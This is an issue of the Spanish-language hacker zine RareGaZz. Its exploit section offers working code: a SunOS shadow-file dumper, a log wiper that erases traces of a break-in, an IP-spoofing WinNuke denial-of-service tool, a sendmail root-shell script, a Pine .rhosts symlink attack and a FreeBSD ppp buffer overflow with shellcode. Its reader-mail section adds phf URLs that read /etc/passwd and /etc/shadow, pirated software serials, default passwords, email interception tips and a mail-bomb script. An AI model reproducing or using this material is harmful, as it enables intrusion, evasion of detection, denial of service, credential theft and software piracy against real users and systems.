/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\

Exploit.- un exploit es un programa que abusa de algun error de un sistema
operativo para conseguir aumentar los privilegios de un usuario
o la caida del sistema.

Estamos de vuelta por demanda popular y esta vez no molestaremos a los SysOps
de bancos, servicios de comunicaciones ;) o cualquier otra Cia. Como unos
saben algunas compa¤ias se quejaron con raretrip por haber sacado en este
zine los numeros de sus sistemas aqui en mexico por eso el ni¤o quiso esperar
que las cosas se enfriaran y nos quito esta peque¤isima parte del zine que
nosotros estabamos haciendo puntualmente. El caso es que ustedes han estado
solicitando mucho codigo fuente y nosotros tenemos los materiales necesarios
para satisfacer sus necesidades de hacker's.

.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

Este codigo imprimira el archivo /etc/shadow en la mayoria de los sistemas
SunOs 5.x Es necesario definir algunas constantes debido a las diferencias
entre los sistemas y tambien por q' algunos operadores cambian los defaults
para "
proteger" su trabajo.

/* This source will/should print out SHADOWPW passwd files. */





struct SHADOWPW { /* see getpwent(3) */


char *pw_name;


char *pw_passwd;


int pw_uid;


int pw_gid;


int pw_quota;


char *pw_comment;


char *pw_gecos;


char *pw_dir;


char *pw_shell;


};


struct passwd *getpwent(), *getpwuid(), *getpwnam();





#ifdef elxsis?





/* Name of the shadow password file. Contains password and aging info */





#define SHADOWPW "
/etc/shadowpw"


#define SHADOWPW_PAG "
/etc/shadowpw.pag"


#define SHADOWPW_DIR "
/etc/shadowpw.dir"


/*


* Shadow password file pwd->pw_gecos field contains:


*


* <type>,<period>,<last_time>,<old_time>,<old_password>


*


* <type> = Type of password criteria to enforce (type int).


* BSD_CRIT (0), normal BSD.


* STR_CRIT (1), strong passwords.


* <period> = Password aging period (type long).


* 0, no aging.


* else, number of seconds in aging period.


* <last_time> = Time (seconds from epoch) of the last password


* change (type long).


* 0, never changed.n


* <old_time> = Time (seconds from epoch) that the current password


* was made the <old_password> (type long).


* 0, never changed.ewromsinm


* <old_password> = Password (encrypted) saved for an aging <period> to


* prevent reuse during that period (type char [20]).


* "
*******", no <old_password>.


*/





/* number of tries to change an aged password */





#define CHANGE_TRIES 3





/* program to execute to change passwords */





#define PASSWD_PROG "
/bin/passwd"





/* Name of the password aging exempt user names and max number of entires */





#define EXEMPTPW "
/etc/exemptpw"


#define MAX_EXEMPT 100





/* Password criteria to enforce */





#define BSD_CRIT 0 /* Normal BSD password criteria */


#define STR_CRIT 1 /* Strong password criteria */


#define MAX_CRIT 1


#endif elxsi


#define NULL 0


main()


{


struct passwd *p;


int i;


for (;1;) {;


p=getpwent();


if (p==NULL) return;


printpw(p);


}


}





printpw(a)


struct SHADOWPW *a;


{


printf("
%s:%s:%d:%d:%s:%s:%s\n",


a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,


a->pw_gecos,a->pw_dir,a->pw_shell);


}





/* SunOS 5.0 /etc/shadow */


/* SunOS4.1+c2 /etc/security/passwd.adjunct */





.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

Este es un exploit para limpiar los archivos que guardan importantes logs
de una entrada ilegitima. Tambien es necesario verificar que los archivos
se localicen donde el codigo lo defina o modificarlo antes de compilar.

#include <sys/types.h>


#include <stdio.h>


#include <unistd.h>


#include <sys/file.h>


#include <fcntl.h>


#include <utmp.h>


#include <pwd.h>


#include <lastlog.h>


#define WTMP_NAME "
/usr/adm/wtmp"


#define UTMP_NAME "
/etc/utmp"


#define LASTLOG_NAME "
/usr/adm/lastlog"





int f;





void kill_utmp(who)


char *who;


{


struct utmp utmp_ent;





if ((f=open(UTMP_NAME,O_RDWR))>=0) {


while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )


if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {


bzero((char *)&utmp_ent,sizeof( utmp_ent ));


lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);


write (f, &utmp_ent, sizeof (utmp_ent));


}


close(f);


}


}





void kill_wtmp(who)


char *who;


{


struct utmp utmp_ent;


long pos;





pos = 1L;


if ((f=open(WTMP_NAME,O_RDWR))>=0) {





while(pos != -1L) {


lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);


if (read (f, &utmp_ent, sizeof (struct utmp))<0) {


pos = -1L;


} else {


if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {


bzero((char *)&utmp_ent,sizeof(struct utmp ));


lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);


write (f, &utmp_ent, sizeof (utmp_ent));


pos = -1L;


} else pos += 1L;


}


}


close(f);


}


}





void kill_lastlog(who)


char *who;


{


struct passwd *pwd;


struct lastlog newll;





if ((pwd=getpwnam(who))!=NULL) {





if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {


lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);


bzero((char *)&newll,sizeof( newll ));


write(f, (char *)&newll, sizeof( newll ));


close(f);


}





} else printf("
%s: ?\n",who);


}





main(argc,argv)


int argc;


char *argv[];


{


if (argc==2) {


kill_lastlog(argv[1]);


kill_wtmp(argv[1]);


kill_utmp(argv[1]);


printf("
Zap2!\n");


} else


printf("
Now...that was as bad as shit!\n");


}


.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

Una version mejorada de WinNuke(c) por HeTak. La diferencia de este codigo
es la adaptacion de un IP Spoofer para que la persona bombardeada no sepa
de donde provienen las bombas. Lamerz Note: Bombardea solo redes Windows.

/* ************************************************************ */=0A=


/* WinBomber 0.9 by HeTak 05.10.97 */=0A=


/* */=0A=


/* This simply demonstrates shitty Win networking by */=0A=


/* sending Out of Bound Message flag in Ba ACK packet. */=0A=


/* The difference between winnuke.c is that WinBomber */=0A=


/* spoofs source ip (you) for extra security so the person */=0A=


/* who will get nuked will not know who sent the nuke. */=0A=


/* FOR EDUCATIONAL PURPOSES ONLY. */=0A=


/* Sometimes I'm on irc, find me there for any questions. */=0A=


/* */=0A=


/* ************************************************************ */=0A=


=0A=


=0A=


=0A=


=0A=


#include <unistd.h>=0A=


=0A=


#include <netinet/in.h>=0A=


#include <netinet/in_systm.h>=0A=


#include <netinet/ip.h>=0A=


#include <netinet/tcp.h>=0A=


#include <netinet/protocols.h>=0A=


#include <arpa/inet.h>=0A=


#include <string.h>=0A=


#include <sys/types.h>=0A=


#include <sys/socket.h>=0A=


#include <stdio.h>=0A=


#include <netinet/in.h>=0A=


#include <netdb.h>=0A=


#include <errno.h>=0A=


=0A=


#define PACKET_SIZE sizeof(struct tcppkt)=0A=


#define DEF_BADDR "
132.45.6.8"=0A=


=0A=


struct tcppkt {=0A=


struct iphdr ip;=0A=


struct tcphdr tcp;=0A=


};=0A=


=0A=


=0A=


=0A=


unsigned short in_chksum(addr, len)=0A=


u_short *addr;=0A=


int len;=0A=


{=0A=


register int nleft =3D len;=0A=


register u_short *w =3D addr;=0A=


register int sum =3D0;=0A=


u_short answer =3D0;=0A=


=0A=


while(nleft > 1) {=0A=


sum+=3D *w++;=0A=


nleft -=3D 2;=0A=


}=0A=


=0A=


if (nleft =3D=3D 1) {=0A=


*(u_char *) (&answer) =3D *(u_char *) w;=0A=


sum+=3Danswer;=0A=


}=0A=


=0A=


sum =3D (sum >> 16) + ( sum & 0xffff);=0A=


sum +=3D (sum >> 16);=0A=


answer =3D ~sum;=0A=


return (answer);=0A=


}=0A=


=0A=


=0A=


=0A=


/* =


********************************************************************** =


*/=0A=


=0A=


int bombaway(sin, fakesock, saddr)=0A=


struct sockaddr_in *sin;=0A=


u_long saddr;=0A=


int fakesock;=0A=


{=0A=


register struct iphdr *ip;=0A=


register struct tcphdr *tcp;=0A=


register char *php;=0A=


static char packet[PACKET_SIZE];=0A=


static char phead[PACKET_SIZE+12];=0A=


u_short len =3D0;=0A=


u_short sport =3D 5150;=0A=


=0A=


ip =3D (struct iphdr *) packet;=0A=


=0A=


ip->ihl =3D 5;=0A=


ip->version =3D 4;=0A=


ip->tos =3D 0;=0A=


ip->tot_len =3D htons(PACKET_SIZE);=0A=


ip->id =3D htons(918 + (rand()%32768));=0A=


ip->frag_off =3D 0;=0A=


ip->ttl =3D 255;=0A=


ip->protocol =3D IPPROTO_TCP;=0A=


ip->check =3D 0;=0A=


ip->saddr =3D saddr;=0A=


ip->daddr =3D sin->sin_addr.s_addr; =0A=


=0A=


tcp =3D (struct tcphdr *)(packet + sizeof(struct iphdr));=0A=


tcp->th_sport =3D htons(sport++);=0A=


tcp->th_dport =3D htons(sin->sin_port);=0A=


tcp->th_seq =3D htonl(31337);=0A=


tcp->th_ack =3D 0; =0A=


tcp->th_x2 =3D 0;=0A=


tcp->th_off =3D 5;=0A=


tcp->th_flags =3D TH_ACK; /* Maybe could use some other flag


*/=0A=


tcp->th_win =3D htons(10052); =0A=


tcp->th_sum =3D 0; =0A=


tcp->th_urp =3D 0; =0A=


php =3D phead;=0A=


memset(php, 0, PACKET_SIZE + 12);=0A=


memcpy(php, &(ip->saddr), 8);=0A=


php +=3D 9;=0A=


memcpy(php, &(ip->protocol), 1);=0A=


len =3D htons(sizeof(struct tcphdr));=0A=


memcpy(++php, &(len), 2);=0A=


php +=3D 2;=0A=


memcpy(php, tcp, sizeof(struct tcphdr));=0A=


=0A=


tcp->th_sum =3D in_chksum(php, sizeof(struct tcphdr)+12);=0A=


=0A=


=0A=


return (sendto(fakesock, packet, PACKET_SIZE, MSG_OOB, (struct =


sockaddr *) sin,=0A=


sizeof(struct sockaddr_in)));=0A=


}=0A=


=0A=


/* =


*********************************************************************** =


*/=0A=


=0A=


=0A=


=0A=


=0A=


u_long=0A=


resolve(host)=0A=


char *host;=0A=


{=0A=


struct hostent *he;=0A=


u_long addr;=0A=


if ((he =3D gethostbyname(host)) =3D=3D NULL) {=0A=


addr =3D inet_addr(host);=0A=


}=0A=


else {=0A=


bcopy(*(he->h_addr_list), &(addr),


sizeof(he->h_addr_list));=0A=


}=0A=


return (addr);=0A=


}=0A=


=0A=


=0A=


main(argc, argv)=0A=


=0A=


int argc;=0A=


char **argv;=0A=


{=0A=


=0A=


int mainsock, fakesock, bombs;=0A=


u_short dport;=0A=


u_long saddr, daddr;=0A=


struct sockaddr_in sin;=0A=


struct hostent *host;=0A=


bombs =3D saddr =3D 0;=0A=


=0A=


=0A=


/* =


************************************************************************=


**************** */=0A=


=0A=


=0A=


if (argc<3)=0A=


{=0A=


printf("
Usage: %s <source> <destination> \n", argv[0]);=0A=


exit();=0A=


}=0A=


=0A=


=0A=


=0A=


if ((daddr =3D resolve(argv[2])) =3D=3D -1) { /* Resolve


destination =


*/=0A=


printf("
Unable to resolve destination hostname -> %s\n",


argv[2]);=0A=


exit(1);=0A=


}=0A=


=0A=


if ((saddr =3D resolve(argv[1])) =3D=3D -1) {=0A=


printf("
Bad spoofed source -> %s\nOhh well...using


default.\n\n", =


argv[1]);=0A=


saddr=3Dinet_addr(DEF_BADDR);=0A=


}=0A=


=0A=


=0A=


dport =3D 139;=0A=


=0A=


/* =


************************************************************************=


**************** */ =0A=


=0A=


=0A=


bzero(&sin, sizeof(struct sockaddr_in));=0A=


sin.sin_family=3DAF_INET;=0A=


sin.sin_addr.s_addr=3Ddaddr;=0A=


sin.sin_port=3Dhtons(139); =0A=


=0A=


=0A=


/* =


***************************************************************** */=0A=


=0A=


if ((mainsock =3D socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)


{=0A=


perror("
Unable to open main socket.");=0A=


exit(1);=0A=


}=0A=


=0A=


if ((fakesock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {=0A=


perror("
Unable to open raw socket.");=0A=


exit(1);=0A=


}=0A=


=0A=


=0A=


if (connect(mainsock, (struct sockaddr *)&sin, 16)=3D=3D -1) {=0A=


perror("
Unable to open connection:");=0A=


close(mainsock);=0A=


}=0A=


=0A=


/* =


***************************************************************** */ =


=0A=


=0A=


printf("
WiNBomber 0.9 by HeTak.\n");=0A=


printf("
Connection established.\n");=0A=


printf("
Sending <%d> bombs to port <%d> to <%s>...\n", =0A=


bombs, ntohs(sin.sin_port), argv[2] );=0A=


printf("
Ready to bomb. Sleeping for a while.\n");=0A=


sleep(3);=0A=


while(bombs!=3D10) {=0A=


printf("
<%s> >=3D----=3D|B+O+M+B|=3D-----> <%s:139>\t#


<%d>\n",=0A=


argv[1], argv[2], bombs);=0A=


bombaway(&sin, fakesock, saddr);=0A=


usleep(100000);=0A=


bombs++;=0A=


}=0A=


printf("
Bombs dropped.\n");=0A=


exit(0);=0A=


}=0A=


=0A=


=0A=


=0A=


=0A=


.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

Exte exploit es conocido como sendmail v.8.8.4 Crea una programa suid en
/tmp/x que consigue shell root. Modifica el directorio temporal segun el
sistema.

cat << _EOF_ >/tmp/x.c


#define RUN "
/bin/ksh"


#include<stdio.h>


main()


{


execl(RUN,RUN,NULL);


}


_EOF_


#


cat << _EOF_ >/tmp/spawnfish.c


main()


{


execl("
/usr/lib/sendmail","/tmp/smtpd",0);


}


_EOF_


#


cat << _EOF_ >/tmp/smtpd.c


main()


{


setuid(0); setgid(0);


system("
chown root /tmp/x ;chmod 4755 /tmp/x");


}


_EOF_


#


#


gcc -O -o /tmp/x /tmp/x.c


gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c


gcc -O3 -o /tmp/smtpd /tmp/smtpd.c


#


/tmp/spawnfish


kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"
[ ]*"// |cut -d" " -f1`


rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c


sleep 5


if [ -u /tmp/x ] ; then


echo "
leet..."


/tmp/x


fi


.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

Este es una buena forma de hackear Pine en sistemas Linux. Viendo la tabla
de procesos con ps se puede ver quien esta corriendo PINE, ahora uno puede
hacer ls en el directorio temporal (/tmp) para recoger los nombres lockfile
de cada usuario. La tabla de procesos otra vez revelara cuando un usuario
termine PINE o termine de leer sus mensajes del buzon de ingreso y borrando
su archivo lockfile.

Creando un link simbolico de /tmp/.hamors_lockfile a ~hamors/.rhosts (como
un ejemplo) causara que PINE haga un archivo ~hamors/.rhosts como un archivo
666 con la ID de proceso como su contenido. Una persona puede hacer un
echo "
+ +" > /tmp/.hamors_lockfile y despues remover -rm- el archivo
/tmp/.hamors_lockfile

Esto fue escrito por Sean B. Hamor y para este ejemplo hamors es la victima
mientras catluvr el atacante.

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "
+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

Este es un script que abusa de la vulnerabilidad de PPP en FreeBSD. Si no
funciona en tu sistema modifica los numeros.

#include <stdio.h>


#include <stdlib.h>


#include <unistd.h>





#define BUFFER_SIZE 156 /* size of the bufer to overflow */





#define OFFSET -290 /* number of bytes to jump after the start


of the buffer */





long get_esp(void) { __asm__("
movl %esp,%eax\n"); }





main(int argc, char *argv[])


{


char *buf = NULL;


unsigned long *addr_ptr = NULL;


char *ptr = NULL;


char execshell[] =


"
\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */


"
\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */


"
\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */


"
\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */





int i,j;





buf = malloc(4096);





/* fill start of bufer with nops */





i = BUFFER_SIZE-strlen(execshell);





memset(buf, 0x90, i);


ptr = buf + i;





/* place exploit code into the buffer */





for(i = 0; i < strlen(execshell); i++)


*ptr++ = execshell[i];





addr_ptr = (long *)ptr;


for(i=0;i < (104/4); i++)


*addr_ptr++ = get_esp() + OFFSET;





ptr = (char *)addr_ptr;


*ptr = 0;





setenv("
HOME", buf, 1);





execl("
/usr/sbin/ppp", "ppp", NULL);


}





.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.

Estos exploits fueron recopilados y pasados a mi por muchos amigos y
compa¤eros de grupo. Ninguno de nosotros escribio estos programas y
dependiendo del sistema las debidas correcciones al codigo deberan ser
hechas.

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð <<::RareGaZz::>> Prueba de que existe vida inteligente en internet ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

ßßßßß ßßßß ßßßß ßßß ßßß ßßßßßß ßßßßßß ßßßß ßßß ßß ßßßßßß
ßß ßß ßß ßß ßß ßß ßßßß ßßßß ßß ßß ßß ßß ßß ßßßß ßß ßß
ßßßßß ßß ßß ßß ßß ßß ßßßß ßß ßßßßß ßßßßßß ßßßßßß ßß ßß ßß ßß ßßß
ßß ßß ßß ßß ßß ßß ßß ßß ßß ßß ßß ßß ßß ßß ßß ßß ßß ßß ßß
ßßßßß ßßßß ßßßß ßß ßß ßßßßßß ßß ßß ßß ßß ßß ßßßß ßßßßß
* Tu linea de comunicacion segura con el underground *
Mail Boy: Raretrip

Saludos aqui estamos de nuevo gracias por esperar. Para cuando lean esta
seccion si no se brincaron ninguna otra ya tandran una idea de como estuvo
este numero y espero que la espera haya valido la pena.
En el numero pasado empezamos el proyecto HACKERZ que pretende crear grupos
o celulas de hackers en distintas partes del globo terraqueo pero nunca me
imagine que existieran tantas ciudades en el mundo...encontrar dos iguales
es muy dificil asi que sigan mandando sus datos por que vale la pena.
Sus datos no seran usados para da¤arlos de hecho en cuanto ustedes nos lo
soliciten podran ser removidos del proyecto. Por la seguridad de nuestros
compa¤eros NO se aceptaran datos de las ciudades de Espa¤a :( lo sentimos
pero aun siguen las represalias en contra de los hackers espa¤oles y no
quisieramos que por nuestra culpa capturaran a otro.

A todos los que se preocuparon por sus datos y direcciones email es necesario
decirles que solamente yo tengo derecho a guardarlos en mi disco duro y
en todo momento (hasta que llega otro dato) permanecen encriptados al igual
que la lista de correo usando Blowfish 32 con una llave larga y se encuentra
en la particion encriptada con Secure Drive de mi disco. Si algo me llegara
a pasar -otra vez- no hay de que preocuparse sus datos no seran revelados
asi como las direcciones en la lista de correo. Dios bendiga los algoritmos
de encripcion :)))

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

NoTa: No estaria mal que en los proveedores que a veces ponen pusieran
la direccion IP o el dominio aparte de telefono porque la verdad eso
de hacer llamadas a ensenada, venezuela, etc. sale caro.:-)

[ Ok. ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

Me gustaria ver si me aceptan y me ayuden a incorporarme a este mundo tan
interesante. Soy novato y tengo mucho que aprender.

[ La lista de RareGaZz no es club privado todos pueden entrar. Para
participar solamente tienes que enviar tus sugerencias o textos y taran. ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

Necesito informacion de como interceptar un e-mail. Pueden brindarmela? Otra
cosa, los numeros de registro del Cool 96 no me andan. Por que puede ser? Les
agradezco su colaboracion.

[ Para interceptar un mail (o muchos) nada mas necesitas tu propio servidor
y configurarlo para que sirva de ruteador de email :) Ahora cuando pase por
tu sistema puedes instalar un "
filtro" que capture mensajes con palabras
escogidas por ti. Los numeros de registro si no te funcionan no se por que
pero aqui van otros:

Cool edit v1.50 for Windows name/You! #/BMJZCPUX
Cool edit v1.51 for Windows name/COOL MAN #/XJMINCLE
CoolEdit +v1.51 for Windows name: The GuaRDiaN aNGeL s/n: BZFLNMAR
CoolEdit +v1.51 Lite for Windows name: tHE riDDLER [uCF] s/n: ZPXSEWLF
CoolEdit v1.52 Full for Windows name: tHE riDDLER [uCF] s/n: CMFRQENH

P.D. Si quieres recibir respuesta mas rapida para la otra que mandes un
mensaje usando remailers incluye una direccion email donde podamos
contestar ;-) ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

[Gratismail es el peor servicio de email que existe!! Lo sentimos pero todos
los mensajes que la lista mando para ese server rebotaron y no pudo llegar
ninguno a su destino. Si su direccion que esta en nuestra lista es de ahi
mil disculpas si no recibieron notificacion cuando aparecio el numero nuevo.
Por ahi recomienda nuestro amigo Arkangel http://www.mailcity.com ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

Queria pediros si tendrias algun crackeador para los juegos Indy3 y Loom.
Muchas gracias. Jorge.

[ Visita http://hack.box.sk -gracias extreme- y en la seccion de cracks o
serials seguro encuentran lo que buscan. ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

Saludos amigos!!

Soy de espa¤a, y el otro dia encontre casi por casualidad vuestra revista.
Estaba mirando por ahi, en los buscadores,y de pronto... anda! si existen
revistas con temas de hacking por sudamerica!! :)) Dicho y hecho, cogi los
numeros (en total habia 6, teneis mas :? ) y me los lei avidamente. Despues de
haberlos leido, llege a la conclusion de que la revista era exactamente lo que
esperaba; un nivel aceptable, con articulos facilones de entender (a veces
demasiado faciles) y otras veces articulos con un nivel tecnico muy
interesante.

Por cierto... no se si lo tendreis, pero aqui va la direccion de la pagina
oficial de #!hispahack:

http://www.angelfire.com/hi/MentesInquietas

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

¨puede un hacker afectar el sistema de un usario atravez de los chat
java como el planetachat (chat venezolano)? gracias y sigan con su excelente
revista que a todos nos sirve. Clark

[ Java es seguro en ese aspecto. Por ahi existia un programa para hackear los
chat rooms de geocities basados en frames. No recuerdo la direccion pero se
que existen programas para hackear los chat rooms basados en frames es por
eso que geocities ya tiene pocos o ningun chat room basado en frames.
Si alguien sabe como hackear los chat rooms basados en java o tiene algun
programa que lo haga ... podria enviarlo o decirnos donde encontrarlo? ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

quisiera saber mas sobre la etiqueta entre hackers. Porque tengo miedo que
usen de sus habilidades para hacker mi IP, o algo parecido. No se hasta donde
podrian llegar. ¨Existe el respeto entre hackers (aunque yo no sea uno)?
Gracias por su contestacion.

[ Nosotros no da¤amos a ningun lector o miembro de nuestra lista de correo.
Si alguien piensa que esto no es cierto envienos sus razones y las
publicaremos y discutiremos en esta seccion. De que serviria hackear a los
que nos escriben o consultan?? ¨ Por que hariamos da¤o a los lectores ?
¨Por que ense¤ariamos a hackear entonces? ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

En el numero 4 hablan de algunas personas molestandolos. ¨ que paso ?

[ Muertos. Las direcciones de correo que usaban desaparecieron de la faz de
i-net tambien las paginas web que tenian en spin y teesa fueron borradas
por ellos mismos cuando misteriosamente se convirtieron en un mirror site
de la pagina de raregazz :-) Los nicks de estas personas son: Eduardo Q.
Gonzalez, Francisco Castro Ortiz y Gina D. Hasta el momento no hemos
vuelto a tener problemas con ellos. ;-) ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

Hay maneras de recargar las tarjetas ladatel ? si es asi me gustaria que me
dijeran como. Ademas de que me gustaria saber como llamar gratuitamente en
los telefonos de tarjetas. No se saben algun codigo ?

[ Las tarjetas no se pueden recargar de ninguna forma no importa lo que
digan otras personas. No, si las dejas al sol no se recargan. Tampoco se
recargaran en el refrigerador ni con el martillo. ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

No saben algo de un programa llamado PROGRESS de como crackearlo es muy
importante. azumlord@hotmail.com

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

Hola!!! que onda! que haciendo me he ausentado un buen de la red por la
pendejada de un servidor de mi ciudad que trae un conflicto con las paginas
de hipertexto y nada mas se puede mediante TELNET y pues el que tengo es una
vil cagada, ¨cual me recomiendas?, ahhh!!!! oye me pudes enviar una copia del
INTERHAK pues he leido de el en la revista y pues se ve que esta fregon.
bueno ya te dejo espero tu respuesta pronto. :-) BYE.

[ Interhak va a estar disponible otra vez en el servidor de geocities lo
puedes conseguir en nuestra pagina de software en "
hacking" o haciendo
click en este link: http://www.geocities.com/Baja/4426/interhak.zip Una
copia del programa TELNET.EXE para Windows 95 que permite seleccionar el
puerto al que quieres realizar una conexion esta en la pagina de software
seccion internet. ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

ojala pudieran decirme como ubicar informacion hacerca de la programacion de
moviles celulares (NOKIA 104-105) , saludos...

[ Si alguien por ahi sabe de la programacion de celulares ... ]

() () () () () () () () () () () ()

  
()() () () () () () () () () () () () ()

a toda madre carnal se pasaron con el anuncio a cuanto les salio ?
christian

[ Yo no lo he visto pero se que cuesta $65 pesos cada vez que sale en t.v. ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

AHORA LES MANDO UN TELEFONO QUE HE ENCONTRADO DE MI PROVEEDOR, QUE SOLO
FUNCIONA EN SAN JOSE DEL CABO, BAJA CALIFORNIA SUR. EL TELEFONO ES 22883, ES
EL UNICO QUE HE ENCONTRADO.

[ Gracias por el numero! ¨ cual es la direccion IP ? ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

[ GuyBrush nos manda los defaults de IRIS que solicitamos el numero pasado! ]

accounting
boss
demo
manager
pdp8
pdp11
software

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

Me podeis decir donde puedo encontrar buenos programas para nukear a
gente en el IRC?

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

necesito urgentemente conseguir los programas kaboom3 y upyours3.zip que
segun esto deverian de ser disponibles en la seccion de e-mail de
raregazz, pero cada vez que trato de bajarlos me dice que no estan
disponibles, y es de a neta que necesito un buenprograma para chingar
passwords de e-mail, en especial de hotmail. urgente.

[ Ya estan los links en la pagina funcionando, si alguno falla pueden
avisarnos. Ahora, si quieres saber el password de una cuenta en hotmail
va a estar kbron. Estan algo protegidos de personas con las mismas
intenciones. Pero este bug *SERVIA* en hotmail para obtener el passwd,
ahora ya no sirve por que pusieron shadow y arreglaron el bug.

Para capturar el passwd
http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd

Para capturar el shadow
http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/shadow ]

() () () () () () () () () () () () ()() () () () () () () () () () () () ()

Hay una manera de mandar e-mails totalmente anonimo con el Mirc, y cuando me
refiero a anonimos ME REFIERO A ANONIMOS, su unico defecto es que no puedes
mandar mensajes muy largos por el buffer del Mirc pero ando tratando de
corregir eso :)

A continuacion adjunto los comandos para lograr mandar un e-mail anonimo:

corten y copien esto en el aliases:
------------------------------------------------------------------

doclos { unset %mail.wi* | window -c @BoMBa De E-MaiL }
mailb {
%mail.* | if (%mail.me != $null) { close -c %mail.me } | killc
window -doe @BoMBa De E-MaiL 173 169 312 111 fixedsys | .timer3434 1
80 doclos
set %mail.win on
.echo @BoMBa De E-MaiL ø Número de mails:
}
/bc {
%r = $$1 $2 $3 $4 $5 | %l = $len(%r) | %nco = 1 | %bb = $chr(0160) |
%bbc = $chr(44) | %bbs = $chr(3) | %bbo = $chr(15) | %bba = $chr(42) |
%o = 1 | %o1 = 1 | %line = "" | :lop | if %o = 6 goto end | %o1 = 1 |
%line = "" | :red | if %o1 > %l { /say %line | /inc %o | goto lop } |
%lt = $mid(%o1,1,%r) | if %lt = $chr(32) set %lt sp | %rt = %lt $+ %o |
%lin = $readini $mircdir $+ font.txt %lt %rt | %nco = %o1 | if %nco ==
16 /set %nco 7 | %mgl = %bbs $+ %nco $+ %bbc $+ %nco $+ %bb $+ %bbo |
%clin = $replace(%lin,%bba,%mgl) | if %lt = sp set %clin %lin | %line =
%line %clin | /inc %o1 | goto red | :end }
mail {
inc %mailbomb
msg = $+ %mail.me MAIL FROM:< $+ %mail.from $+ >
msg = $+ %mail.me RCPT TO:< $+ %mail.to $+ >
msg = $+ %mail.me DATA
msg = $+ %mail.me Date: 23 Oct 81 11:22:33
msg = $+ %mail.me From: %mail.from
msg = $+ %mail.me To: %mail.to
msg = $+ %mail.me Subject: %mail.subject
